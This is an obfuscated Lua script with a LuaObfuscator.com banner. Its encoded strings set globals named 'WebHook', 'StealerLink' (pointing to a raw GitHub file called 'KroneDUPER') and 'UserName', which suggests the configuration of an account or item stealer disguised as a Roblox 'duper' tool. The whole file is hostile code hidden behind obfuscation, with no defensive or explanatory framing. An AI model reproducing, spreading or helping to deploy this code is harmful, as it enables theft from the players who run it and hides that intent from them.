--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v89=0;local v90;while true do if (v89==0) then v90=v2(v0(v30,16));if v19 then local v118=0;local v119;while true do if (v118==1) then return v119;end if (v118==0) then v119=v5(v90,v19);v19=nil;v118=1;end end else return v90;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v91=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-1)) + 1)) ;return v91-(v91%(620 -(555 + 64))) ;else local v92=(933 -(135 + 722 + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v92 + v92))>=v92) and (928 -((1091 -(282 + 595)) + 713))) or (0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (2 -0) ;return (v36 * (1893 -(1523 + 114))) + v35 ;end local function v23() local v37=(1620 -(87 + 263)) -(226 + 1044) ;local v38;local v39;local v40;local v41;while true do if (v37==(4 -3)) then return (v41 * (16777333 -(32 + 85))) + (v40 * (64226 + 1310)) + (v39 * (57 + 199)) + v38 ;end if (v37==(957 -(892 + 65))) then v38,v39,v40,v41=v1(v16,v18,v18 + (7 -4) );v18=v18 + ((186 -(67 + 113)) -2) ;v37=1 -(0 + 0) ;end end end local function v24() local v42=v23();local v43=v23();local v44=2 -1 ;local v45=(v20(v43,1 + 0 ,20) * ((7 -5)^(984 -(802 + 150)))) + v42 ;local v46=v20(v43,56 -35 ,55 -24 );local v47=((v20(v43,56 -24 )==(1 + 0)) and  -(998 -(915 + 82))) or (2 -(3 -2)) ;if (v46==(0 + 0)) then if (v45==0) then return v47 * (0 -0) ;else local v111=1187 -(1069 + 118) ;while true do if (v111==0) then v46=2 -1 ;v44=0 -(442 -(416 + 26)) ;break;end end end elseif (v46==(356 + (5399 -3708))) then return ((v45==0) and (v47 * ((1 -0)/(0 + 0)))) or (v47 * NaN) ;end return v8(v47,v46-(1814 -(158 + 210 + 423)) ) * (v44 + (v45/((6 -4)^(70 -(10 + 8))))) ;end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==0) then return "";end end v49=v3(v16,v18,(v18 + v48) -(431 -(44 + 386)) );v18=v18 + v48 ;local v50={};for v66=1487 -(998 + 488) , #v49 do v50[v66]=v2(v1(v3(v49,v66,v66)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v93,v94,v95,v96,v97,v98,v99,v100,v101) local v102=(function() return 1784 -(599 + 1185) ;end)();local v93=(function() return;end)();local v94=(function() return;end)();while true do if (v102==0) then local v116=(function() return 0 + 0 ;end)();while true do if (1~=v116) then else v102=(function() return 1;end)();break;end if (v116==(0 + 0)) then v93=(function() return 574 -(507 + 67) ;end)();v94=(function() return nil;end)();v116=(function() return 1;end)();end end end if (1~=v102) then else local v117=(function() return 0;end)();while true do if (v117==(1749 -(1013 + 736))) then while true do if (0~=v93) then else v94=(function() return v95();end)();if (v96(v94, #">", #"[")==(0 + 0)) then local v139=(function() return 0;end)();local v140=(function() return;end)();local v141=(function() return;end)();local v142=(function() return;end)();local v143=(function() return;end)();while true do if ((4 -2)~=v139) then else while true do if ((7 -5)==v140) then local v148=(function() return 867 -(550 + 317) ;end)();local v149=(function() return;end)();while true do if (v148==0) then v149=(function() return 0;end)();while true do if (v149==0) then if (v96(v142, #",", #".")== #"!") then v143[2]=(function() return v97[v143[2]];end)();end if (v96(v142,2,2)== #" ") then v143[ #"asd"]=(function() return v97[v143[ #"asd"]];end)();end v149=(function() return 1;end)();end if (v149~=(1 -0)) then else v140=(function() return  #"xnx";end)();break;end end break;end end end if (v140~= #":") then else local v150=(function() return 0 -0 ;end)();local v151=(function() return;end)();while true do if (v150==0) then v151=(function() return 0 -0 ;end)();while true do if (v151==(285 -(134 + 151))) then v143=(function() return {v98(),v98(),nil,nil};end)();if (v141==(0 -0)) then local v158=(function() return 0;end)();local v159=(function() return;end)();while true do if (v158==0) then v159=(function() return 1990 -(582 + 1408) ;end)();while true do if (v159==0) then v143[ #"19("]=(function() return v98();end)();v143[ #"asd1"]=(function() return v98();end)();break;end end break;end end elseif (v141== #",") then v143[ #"91("]=(function() return v99();end)();elseif (v141==2) then v143[ #"xnx"]=(function() return v99() -((6 -4)^(19 -3)) ;end)();elseif (v141== #"asd") then local v164=(function() return 0 -0 ;end)();local v165=(function() return;end)();while true do if (v164~=0) then else v165=(function() return 0;end)();while true do if (v165==0) then v143[ #"-19"]=(function() return v99() -((1826 -(1195 + 629))^16) ;end)();v143[ #"0836"]=(function() return v98();end)();break;end end break;end end end v151=(function() return 1 -0 ;end)();end if (1==v151) then v140=(function() return 243 -(187 + 54) ;end)();break;end end break;end end end if (v140== #"91(") then if (v96(v142, #"asd", #"19(")== #"~") then v143[ #"?id="]=(function() return v97[v143[ #"0313"]];end)();end v100[v101]=(function() return v143;end)();break;end if (v140~=(780 -(162 + 618))) then else local v153=(function() return 0;end)();local v154=(function() return;end)();while true do if (v153~=(0 + 0)) then else v154=(function() return 0;end)();while true do if (v154~=(1 + 0)) then else v140=(function() return  #"[";end)();break;end if (v154~=0) then else v141=(function() return v96(v94,2, #"91(");end)();v142=(function() return v96(v94, #".com",6);end)();v154=(function() return 1;end)();end end break;end end end end break;end if (v139==0) then local v144=(function() return 0;end)();local v145=(function() return;end)();while true do if (v144==0) then v145=(function() return 0;end)();while true do if (v145~=(1 -0)) then else v139=(function() return 1 -0 ;end)();break;end if (v145==0) then v140=(function() return 0;end)();v141=(function() return nil;end)();v145=(function() return 1 + 0 ;end)();end end break;end end end if (v139==1) then local v146=(function() return 0;end)();local v147=(function() return;end)();while true do if ((1636 -(1373 + 263))~=v146) then else v147=(function() return 1000 -(451 + 549) ;end)();while true do if (v147==0) then v142=(function() return nil;end)();v143=(function() return nil;end)();v147=(function() return 1 + 0 ;end)();end if (v147==(1 -0)) then v139=(function() return 2;end)();break;end end break;end end end end end break;end end return v93,v94,v95,v96,v97,v98,v99,v100,v101;end end end end end;end)();local v52=(function() return function(v103,v104,v105) local v106=(function() return 0;end)();local v107=(function() return;end)();while true do if (0==v106) then v107=(function() return 0;end)();while true do if (v107==(0 -0)) then v103[v104-#"\\" ]=(function() return v105();end)();return v103,v104,v105;end end break;end end end;end)();local v53=(function() return {};end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {v53,v54,nil,v55};end)();local v57=(function() return v23();end)();local v58=(function() return {};end)();for v68= #"\\",v57 do local v69=(function() return 0;end)();local v70=(function() return;end)();local v71=(function() return;end)();local v72=(function() return;end)();while true do if (v69~=(0 + 0)) then else v70=(function() return 0;end)();v71=(function() return nil;end)();v69=(function() return 1 -0 ;end)();end if (v69~=(342 -(218 + 123))) then else v72=(function() return nil;end)();while true do if ((1581 -(1535 + 46))==v70) then local v120=(function() return 0 + 0 ;end)();while true do if (v120==(1 + 0)) then v70=(function() return 561 -(306 + 254) ;end)();break;end if (v120~=(0 + 0)) then else v71=(function() return v21();end)();v72=(function() return nil;end)();v120=(function() return 1 -0 ;end)();end end end if (1==v70) then if (v71== #"!") then v72=(function() return v21()~=0 ;end)();elseif (v71==2) then v72=(function() return v24();end)();elseif (v71== #"xxx") then v72=(function() return v25();end)();end v58[v68]=(function() return v72;end)();break;end end break;end end end v56[ #"asd"]=(function() return v21();end)();for v73= #"}",v23() do FlatIdent_43862,Descriptor,v21,v20,v58,v22,v23,v53,v73=(function() return v51(FlatIdent_43862,Descriptor,v21,v20,v58,v22,v23,v53,v73);end)();end for v74= #"~",v23() do v54,v74,v28=(function() return v52(v54,v74,v28);end)();end return v56;end local function v29(v60,v61,v62) local v63=v60[1468 -((2571 -1672) + 568) ];local v64=v60[2 + 0 ];local v65=v60[3];return function(...) local v75=v63;local v76=v64;local v77=v65;local v78=v27;local v79=2 -1 ;local v80= -(604 -(268 + 335));local v81={};local v82={...};local v83=v12("#",...) -(573 -(426 + 146)) ;local v84={};local v85={};for v108=0 + 0 ,v83 do if ((v108>=v77) or (3342>4148)) then v81[v108-v77 ]=v82[v108 + (1457 -((2182 -(106 + 1794)) + 372 + 802)) ];else v85[v108]=v82[v108 + 1 ];end end local v86=(v83-v77) + ((206 + 606) -(569 + 242)) ;local v87;local v88;while true do v87=v75[v79];v88=v87[(5 -3) -1 ];if (v88<=(1 + 4)) then if (v88<=(1026 -(706 + 318))) then if (v88<=0) then if (v85[v87[1253 -(721 + (1435 -905)) ]]==v87[1275 -(945 + 326) ]) then v79=v79 + (2 -1) ;else v79=v87[3 + 0 ];end elseif (v88==(701 -((385 -(4 + 110)) + 429))) then v85[v87[(586 -(57 + 527)) + (1427 -(41 + 1386)) ]]=v87[3];else v85[v87[2]]=v87[(1606 -(17 + 86)) -(1408 + 63 + 29) ];end elseif (v88<=(6 -3)) then v62[v87[3]]=v85[v87[(3150 -2062) -(461 + 625) ]];elseif (v88==(170 -(122 + 44))) then v79=v87[1291 -(993 + (509 -214)) ];else for v134=v87[1 + 1 ],v87[3] do v85[v134]=nil;end end elseif (v88<=(1179 -(418 + 753))) then if ((v88<=6) or (1434<=480)) then v79=v87[2 + 1 ];elseif (v88==(1 + (19 -13))) then if (v85[v87[1 + 1 ]]==v87[2 + 2 ]) then v79=v79 + (530 -(406 + 123)) ;else v79=v87[1772 -(1749 + 20) ];end else for v136=v87[1 + 1 ],v87[1325 -(1017 + 232 + 73) ] do v85[v136]=nil;end end elseif ((v88<=9) or (74>143)) then v62[v87[1 + 1 + 1 ]]=v85[v87[1147 -(466 + 679) ]];elseif ((18<2112) and (v88==(20 -10))) then do return;end else do return;end end v79=v79 + ((67 -(30 + 35)) -1) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!083Q00028Q00026Q00F03F03073Q00576562482Q6F6B03203Q003362343736663032333766376265663437366361383465346436626630393038030B3Q00537465616C65724C696E6B03493Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F4B72616E6F6E652F424753492F726566732F68656164732F6D61696E2F4B726F6E65445550455203083Q00557365724E616D6503053Q007834396E6D001D3Q0012013Q00014Q0008000100013Q0026073Q0002000100010004063Q00020001001201000100013Q0026070001000A000100020004063Q000A0001001201000200043Q001203000200033Q0004063Q001C000100260700010005000100010004063Q00050001001201000200013Q00260700020014000100010004063Q00140001001201000300063Q001203000300053Q001201000300083Q001203000300073Q001201000200023Q0026070002000D000100020004063Q000D0001001201000100023Q0004063Q000500010004063Q000D00010004063Q000500010004063Q001C00010004063Q000200012Q000A3Q00017Q00",v9(),...);
